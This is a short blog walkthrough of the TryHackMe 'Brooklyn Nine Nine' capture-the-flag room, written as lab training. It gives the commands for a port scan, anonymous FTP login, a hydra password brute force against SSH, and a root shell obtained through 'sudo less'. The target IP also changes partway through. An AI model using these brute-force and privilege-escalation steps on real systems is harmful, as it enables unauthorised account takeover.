TryHackMe solution: Brooklyn Nine Nine

Link: https://tryhackme.com/room/brooklynninenine

#1 “User flag

Use nmap to find open ports:

nmap -sCV 10.10.214.116

Port 21 is open and anonymous ftp login is allowed. So we connect to ftp:

ftp 10.10.214.116

with:

username: anonymous
password: anonymous

And we found a text file.

So we have the username “jake“.

We can use hydra with rockyou.txt to find the password.

hydra -l jake -P rockyou.txt 10.10.11.109 ssh

Then connect to jake‘s ssh with the password we found.

ssh jake@10.10.11.109

And we can get the flag in /home/holt:

#2 “Root flag

See what we can do with:

sudo -l

And get root with:

sudo less /etc/profile
!/bin/sh

Leave a comment

Design a site like this with WordPress.com
Get started